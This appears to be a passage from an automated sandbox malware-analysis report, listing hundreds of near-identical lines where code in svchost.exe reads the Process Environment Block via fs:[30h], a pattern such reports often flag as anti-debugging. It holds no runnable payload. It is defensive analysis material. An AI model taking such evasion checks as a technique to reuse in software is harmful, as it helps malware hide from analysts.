                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h] 2_2_03BB0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h] 2_2_03BB0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h] 2_2_03B402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h] 2_2_03B402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h] 2_2_03B402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03B3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03B3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03B3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03B3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03B3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B2823B mov eax, dword ptr fs:[00000030h] 2_2_03B2823B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] 2_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] 2_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] 2_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] 2_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] 2_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] 2_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] 2_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] 2_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] 2_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] 2_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] 2_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] 2_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h] 2_2_03B34260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h] 2_2_03B34260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h] 2_2_03B34260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B2826B mov eax, dword ptr fs:[00000030h] 2_2_03B2826B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B2A250 mov eax, dword ptr fs:[00000030h] 2_2_03B2A250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B36259 mov eax, dword ptr fs:[00000030h] 2_2_03B36259
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h] 2_2_03BEA250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h] 2_2_03BEA250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB8243 mov eax, dword ptr fs:[00000030h] 2_2_03BB8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB8243 mov ecx, dword ptr fs:[00000030h] 2_2_03BB8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h] 2_2_03BB019F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h] 2_2_03BB019F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h] 2_2_03BB019F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h] 2_2_03BB019F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h] 2_2_03B2A197
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h] 2_2_03B2A197
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h] 2_2_03B2A197
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C061E5 mov eax, dword ptr fs:[00000030h] 2_2_03C061E5
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B70185 mov eax, dword ptr fs:[00000030h] 2_2_03B70185
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h] 2_2_03BEC188
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h] 2_2_03BEC188
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h] 2_2_03BD4180
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h] 2_2_03BD4180
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B601F8 mov eax, dword ptr fs:[00000030h] 2_2_03B601F8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_03BAE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_03BAE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h] 2_2_03BAE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_03BAE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_03BAE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h] 2_2_03BF61C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h] 2_2_03BF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60124 mov eax, dword ptr fs:[00000030h]2_2_03B60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov ecx, dword ptr fs:[00000030h]2_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF0115 mov eax, dword ptr fs:[00000030h]2_2_03BF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C156 mov eax, dword ptr fs:[00000030h]2_2_03B2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC8158 mov eax, dword ptr fs:[00000030h]2_2_03BC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov ecx, dword ptr fs:[00000030h]2_2_03BC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov eax, dword ptr fs:[00000030h]2_2_03BF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03BF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC80A8 mov eax, dword ptr fs:[00000030h]2_2_03BC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3208A mov eax, dword ptr fs:[00000030h]2_2_03B3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03B2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B720F0 mov ecx, dword ptr fs:[00000030h]2_2_03B720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03B2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B380E9 mov eax, dword ptr fs:[00000030h]2_2_03B380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB60E0 mov eax, dword ptr fs:[00000030h]2_2_03BB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB20DE mov eax, dword ptr fs:[00000030h]2_2_03BB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6030 mov eax, dword ptr fs:[00000030h]2_2_03BC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A020 mov eax, dword ptr fs:[00000030h]2_2_03B2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C020 mov eax, dword ptr fs:[00000030h]2_2_03B2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4000 mov ecx, dword ptr fs:[00000030h]2_2_03BB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5C073 mov eax, dword ptr fs:[00000030h]2_2_03B5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32050 mov eax, dword ptr fs:[00000030h]2_2_03B32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6050 mov eax, dword ptr fs:[00000030h]2_2_03BB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B307AF mov eax, dword ptr fs:[00000030h]2_2_03B307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE47A0 mov eax, dword ptr fs:[00000030h]2_2_03BE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD678E mov eax, dword ptr fs:[00000030h]2_2_03BD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]2_2_03BBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03B3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB07C3 mov eax, dword ptr fs:[00000030h]2_2_03BB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov ecx, dword ptr fs:[00000030h]2_2_03B6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAC730 mov eax, dword ptr fs:[00000030h]2_2_03BAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30710 mov eax, dword ptr fs:[00000030h]2_2_03B30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60710 mov eax, dword ptr fs:[00000030h]2_2_03B60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C700 mov eax, dword ptr fs:[00000030h]2_2_03B6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38770 mov eax, dword ptr fs:[00000030h]2_2_03B38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30750 mov eax, dword ptr fs:[00000030h]2_2_03B30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE75D mov eax, dword ptr fs:[00000030h]2_2_03BBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]2_2_03B72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]2_2_03B72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4755 mov eax, dword ptr fs:[00000030h]2_2_03BB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov esi, dword ptr fs:[00000030h]2_2_03B6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]2_2_03B6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]2_2_03B6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B666B0 mov eax, dword ptr fs:[00000030h]2_2_03B666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03B6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]2_2_03B34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]2_2_03B34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]2_2_03BB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]2_2_03BB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03B6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03B6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E627 mov eax, dword ptr fs:[00000030h]2_2_03B4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B66620 mov eax, dword ptr fs:[00000030h]2_2_03B66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68620 mov eax, dword ptr fs:[00000030h]2_2_03B68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3262C mov eax, dword ptr fs:[00000030h]2_2_03B3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72619 mov eax, dword ptr fs:[00000030h]2_2_03B72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE609 mov eax, dword ptr fs:[00000030h]2_2_03BAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B62674 mov eax, dword ptr fs:[00000030h]2_2_03B62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]2_2_03BF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]2_2_03BF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]2_2_03B6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]2_2_03B6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4C640 mov eax, dword ptr fs:[00000030h]2_2_03B4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]2_2_03B545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]2_2_03B545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E59C mov eax, dword ptr fs:[00000030h]2_2_03B6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32582 mov eax, dword ptr fs:[00000030h]2_2_03B32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32582 mov ecx, dword ptr fs:[00000030h]2_2_03B32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64588 mov eax, dword ptr fs:[00000030h]2_2_03B64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B325E0 mov eax, dword ptr fs:[00000030h]2_2_03B325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]2_2_03B6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]2_2_03B6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B365D0 mov eax, dword ptr fs:[00000030h]2_2_03B365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03B6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03B6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]2_2_03B6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]2_2_03B6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6500 mov eax, dword ptr fs:[00000030h]2_2_03BC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
